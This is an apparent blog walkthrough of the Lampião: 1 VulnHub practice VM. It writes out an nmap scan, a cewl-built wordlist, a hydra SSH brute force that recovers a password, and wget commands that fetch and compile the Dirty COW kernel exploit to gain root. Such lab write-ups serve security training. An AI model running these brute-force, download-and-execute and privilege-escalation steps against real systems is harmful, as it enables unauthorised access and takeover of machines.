This post documents the complete walkthrough of Lampião: 1, a boot2root VM created by Tiago Tavares, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

“Captain” Virgulino Ferreira da Silva, better known as Lampião, was the most famous bandit leader of the Cangaço. The aim is to get root .

Information Gathering

Let’s start with a nmap scan to establish the available services in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.10.130 ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA) | 2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA) | 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA) |_ 256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519) 80/tcp open http? syn-ack ttl 64 | fingerprint-strings: | NULL: | _____ _ _ | |_|/ ___ ___ __ _ ___ _ _ | \x20| __/ (_| __ \x20|_| |_ | ___/ __| |___/ ___|__,_|___/__, ( ) | |___/ | ______ _ _ _ | ___(_) | | | | | \x20/ _` | / _ / _` | | | |/ _` | | |_ __,_|__,_|_| |_| 1898/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Lampi\xC3\xA3o

nmap finds 22/tcp , 80/tcp and 1898/tcp open—and there’s something interesting behind 80/tcp .

“Fi duma égua” is a not-so-elegant word for referring to someone. I leave it for the curious reader to find out what it means.

Drupal

Another service worth exploring is Drupal, which runs behind 1898/tcp . Here’s how it looks like.

To be honest, I’m always excited to see non-English language in display because that means I can generate a wordlist from it. There’s always a high chance of getting a password judging from my experience.

Let’s use cewl to generate a wordlist from the post “Lampião, herói ou vilão do Sertão?”. The command goes like this.

# cewl -w cewl.txt http://192.168.10.130:1898/?q=node/1 # wc -l cewl.txt 835 cewl.txt

Hail Hydra

Notice the two usernames below: tiago and eder .

Let’s put them into a username list and go with hydra and the generated wordlist. Perhaps we can get lucky with SSH on our first attempt?

# echo tiago > usernames.txt # echo eder >> usernames.txt # hydra -L usernames.txt -P cewl.txt -f -e nsr -o hydra.txt -t 4 ssh://192.168.10.130 [22][ssh] host: 192.168.10.130 login: tiago password: Virgulino [STATUS] attack finished for 192.168.10.130 (valid pair found) 1 of 1 target successfully completed, 1 valid password found

Lucky indeed.

Low-Privilege Shell

Not too shabby.

Privilege Escalation

Let’s perform some basic enumeration to determine what we’re dealing with.

$ uname -a Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 14.04.5 LTS Release: 14.04 Codename: trusty

I’m going to use a script to suggest a couple of local privilege escalation exploits relevant to the distribution and kernel.

$ wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh $ chmod +x /tmp/linux-exploit-suggester.sh $ /tmp/linux-exploit-suggester.sh ... [+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: https://www.exploit-db.com/download/40847.cpp Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

Let’s test the exploit out.

$ wget -q -O /tmp/40847.cpp https://www.exploit-db.com/download/40847.cpp $ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil $ ./dcow -s

Boom.

What’s the Flag (WTF)?

I wonder what’s the significance of lampiao.jpg to the flag. Here’s what lampiao.jpg looks like.

Afterthought

The VM isn’t hard. Don’t think too deep, too far. Don’t go down the rabbit hole. Tiago (the creator of this VM) laid down a bunch of teasers that may steer you off course.

One good example is qrc.png in the Drupal home directory.

It was decoded to “Try harder! muahuahua”